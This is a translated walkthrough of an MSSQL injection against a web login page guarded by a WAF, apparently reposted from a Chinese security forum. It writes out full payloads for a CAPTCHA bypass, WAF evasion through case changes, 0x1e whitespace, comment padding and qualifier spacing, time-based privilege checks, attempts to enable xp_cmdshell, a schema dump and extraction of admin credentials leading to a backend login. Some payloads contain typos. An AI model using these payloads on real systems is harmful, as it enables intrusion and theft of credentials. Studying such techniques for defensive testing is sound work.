Title: Remember to use a practical MSSQL injection to bypass WAF

This test is an authorized test. The username where the injection point logs in in the background is

Verification code exists, and verification can be bypassed by deleting cookies and verification code fields

Add a single quote and report an error

and '1'='1

Connection reset —— is intercepted by WAF

Change case and replace space with MSSQL whitespace [0x00-0x20]

%1eaNd%1e'1'='1

Query database version, MSSQL 2012 x64

%1eoR%1e1=@@version%1e--

Query the current user

%1eoR%1e1=user%1e--

Query whether the current user is dba and db_owner

;if(0=(SelEct%1eis_srvrolemember('sysadmin'))) WaItFOR%1edeLAY%1e'0:0:5'%1e --

;if(0=(SelEct%1eis_srvrolemember('db_owner'))) WaItFOR%1edeLAY%1e'0:0:5'%1e --

Both have delays, the current user is neither dba nor db_owner

Try to execute xp_cmdsehll, no relevant permissions

;eXeC%1esp_configure%1e'show advanced options',1;RECONFIGURE%1e --

;eXeC%1esp_configure%1e'xp_cmdshell',1;RECONFIGURE%1e --

Query the current database, the connection reset —— is intercepted by WAF

%1eoR%1e1=(db_name()%1e)%1e--

Remove a character of the function name and return ——WAF normally filters the function db_name(). MSSQL and MSQL have some similar features, such as: function names and brackets can be filled with comments or whitespace characters.

%1eoR%1e1=(db_name/**/()%1e)%1e--

Query the table of the current database, the connection reset —— is intercepted by WAF

%1eoR%1e1=(SelEct%1eop%1e1%1etaBle_nAme from%1einfOrmatiOn_sChema.tAbles%1e)%1e--

Delete the statement after select and return to normal. In the IIS+ASPX environment, if multiple parameters of the same name are submitted at the same time, the value of the parameters received by the server is multiple values connected with commas. In actual applications, commas can be commented out with the aid of comments.

%1eoR%1e1=(SelEct/*username=*/%1eop%1e1%1etaBle_nAme from%1einfOrmatiOn_sChema.tAbles%1e)%1e--

Still intercepted

Delete a character of infOrmatiOn_sChema.tAbles and returns normal ——WAF filters infOrmatiOn_sChema.tAbles. When I was learning MYSQL injection, I saw the official document saying this: 'The qualification character is a separate token and need not be contiguous with the associated identifiers.' It can be seen that the qualifier (such as '.') can be inserted into whitespace characters on the left and right, and MSSQL has the same characteristics after testing. infOrmatiOn_sChem.tAbles - infOrmatiOn_sChem%0f.%0ftAbles

%1eoR%1e1=(SelEct/*username=*/%1eop%1e1%1etaBle_nAme from%1einfOrmatiOn_sChema%0f.%0ftAbles%1e)%1e--

The table name can be traversed by not in('table_1','table_2'.)

Manual injection is too slow to use this method, query all table names at once

%1eoR%1e1=(SelEct/*username=*/%1equotename(name)%1efRom bak_ptfl%0f.sysobjects%1ewHerE%1extype='U' FOR XML PATH(''))%1e--

Judging from the table name, the administrator table should be appsadmin, and all columns of the table should be queryed at one time.

%1eoR%1e1=(SelEct/*username=*/%1equotename/**/(name)%1efRom bak_ptfl%0f.syscolumns%1ewHerE%1eid=(selEct/*username=*/%1eid%1efrom%1ebak_ptfl%0f.sysobjects%1ewHerE%1ename='appsadmin')%1efoR%1eXML%1ePATH/**/(''))%1e--password=admin

Obtain the administrator username and password fields: AdminName, Password. Query username and password

%1eoR%1e1=(SelEct/*username=*/%1etOp%1e1%1eAdminName%1efRom%1eappsadmin%1e)%1e--

%1eoR%1e1=(SelEct/*username=*/%1etOp%1e1%1epassword%1efRom%1eappsadmin)%1e--

After decryption, logging into the background successfully

Summary

1. BP packet capture of the target site and found that there is a verification code in the target system

2. Delete the cookie parameters and values in the requested data packet and delete the verification code parameters and values.

3. Make a request again and find no information prompting the verification code error

4. Add single quotes to the username in the requested post packet to report an error

username=amdin'password=admin

5. Test and '1'='1, cannot be displayed, then the target system has WAF

username=amdin' and '1'='1password=admin

6. Change the case of the and keyword, and replace the space with the mssql whitespace ([0x00-0x20]), that is, %1e. You can see the normal echo content

username=amdin'%1eaNd%1e'1'='1password=admin

7. Query the database version

username=amdin'%1eoR%1e1=@@version%1e--password=admin

8. Query the current user

username=amdin'%1eoR%1e1=user%1e--password=admin

9. Query whether the current user is dba and db_owner, both of which have delays. The current user is neither dba nor db_owner

username=amdin';if(0=(SelEct%1eis_srvrolemember('sysadmin'))) WaItFOR%1edeLAY%1e'0:0:5'%1e --password=admin

username=amdin';if(0=(SelEct%1eis_srvrolemember('db_owner'))) WaItFOR%1edeLAY%1e'0:0:5'%1e --password=admin

10. Try to execute xp_cmdsehll, without relevant permissions, prompting xp_cmdshell does not exist

username=amdin';eXeC%1esp_configure%1e'show advanced options',1;RECONFIGURE%1e --password=admin

username=amdin';eXeC%1esp_configure%1e'xp_cmdshell',1;RECONFIGURE%1e --password=admin

11. Query the current database name, and the connection reset —— is intercepted by WAF

username=amdin'%1eoR%1e1=(db_name()%1e)%1e--password=admin

12.waf may intercept the db_name() function. Here you can use the function name and parentheses to fill it with comments /**/or whitespace characters to successfully obtain the current database name.

username=amdin'%1eoR%1e1=(db_name/**/()%1e)%1e--password=admin

13. Get the current database table, and the connection reset —— is intercepted by WAF

username=amdin'%1eoR%1e1=(SelEct%1eop%1e1%1etaBle_nAme from%1einfOrmatiOn_sChema.tAbles%1e)%1e--password=admin

14. Delete the statement after select and return to normal. In the IIS+ASPX environment, if multiple parameters of the same name are submitted at the same time, the value of the parameters received by the server is multiple values connected with commas. In actual applications, commas can be commented out with comments, and they are still intercepted by WAF.

username=amdin'%1eoR%1e1=(SelEct/*username=*/%1eop%1e1%1etaBle_nAme from%1einfOrmatiOn_sChem.tAbles%1e)%1e--password=admin

15. Delete a character of infOrmatiOn_sChema.tAbles and return normal ——WAF filters infOrmatiOn_sChema.tAbles. When I was learning MYSQL injection, I saw the official document saying this: 'The qualification character is a separate token and need not be contiguous with the associated identifiers.' It can be seen that the qualifier (such as '.') can be inserted into whitespace characters on the left and right, and MSSQL has the same characteristics after testing. infOrmatiOn_sChema.tAbles - infOrmatiOn_sChema%0f.%0ftAbles, successfully obtain table name

username=amdin'%1eoR%1e1=(SelEct/*username=*/%1eop%1e1%1etaBle_nAme from%1einfOrmatiOn_sChema%0f.%0ftAbles%1e)%1e--password=admin

16. Query all table names at once

username=amdin'%1eoR%1e1=(SelEct/*username=*/%1equotename(name)%1efRom bak_ptfl%0f.sysobjects%1ewHerE%1extype='U' FOR XML PATH(''))%1e--password=admin

17. Judging from the table name, the administrator table should be appsadmin, and query all columns of the table at once.

username=amdin'%1eoR%1e1=(SelEct/*username=*/%1equotename/**/(name)%1efRom bak_ptfl%0f.syscolumns%1ewHerE%1eid=(selEct/*username=*/%1eid%1efrom%1ebak_ptfl%0f.sysobjects%1ewHerE%1ename='appsadmin')%1efoR%1eXML%1ePATH/**/(''))%1e--password=admin

18. Obtain the administrator username and password fields: AdminName, Password. Query username and password

username=amdin'%1eoR%1e1=(SelEct/*username=*/%1etOp%1e1%1eAdminName%1efRom%1eappsadmin%1e)%1e--password=admin

username=amdin'

%1eoR%1e1=(SelEct/*username=*/%1etOp%1e1%1epassword%1efRom%1eappsadmin)%1e--password=admin

20. Decrypt the password hash value of the username and successfully log in to the background

Original link: https://xz.aliyun.com/t/7487